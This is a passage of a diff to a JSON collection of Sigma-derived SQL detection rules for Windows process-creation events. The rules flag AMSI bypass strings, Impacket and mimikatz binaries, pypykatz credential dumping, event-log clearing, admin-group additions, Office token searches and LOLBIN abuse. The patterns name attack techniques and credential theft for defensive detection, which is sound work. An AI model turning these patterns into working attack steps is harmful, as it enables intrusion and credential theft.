'%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "status": "experimental", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence 
creation.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Use of Forfiles For Execution", - "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "status": "experimental", - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use via a batch script or by an administrator." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_forfiles.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "status": "experimental", + "description": "Office application called wmic to proxye execution through a LOLBIN process. 
This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "File Deletion Via Del", - "id": "379fa130-190e-4c3f-b7bc-6c8e834485f3", - "status": "experimental", - "description": "Detects execution of the builtin \"del\"/\"erase\" commands in order to delete files.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "status": "test", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1562.004" ], "falsepositives": [ - "False positives levels will differ Depending on the environment. 
You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity" + "Legitimate administration activity" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '% /f%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% /q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_del_execution.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", + "status": "experimental", + "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "Fsutil Behavior Set SymlinkEvaluation", - "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "author": "frack113", + "description": "Detects suspicious command line that adds an 
account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate use" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1557.001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Legitimate commands in .lnk files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Suspicious Extexport Execution", - "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "author": "frack113", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". 
This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_extexport.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Execution of Taskkill", - "id": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "author": "frack113", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Expected FP with 
some processes using this techniques to terminate one of their processes during installations and updates" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR OriginalFileName = 'taskkill.exe') AND (CommandLine LIKE '% /f%' ESCAPE '\\' AND CommandLine LIKE '% /im %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskkill_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. 
This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "title": "Suspicious Windows App Activity", + "id": 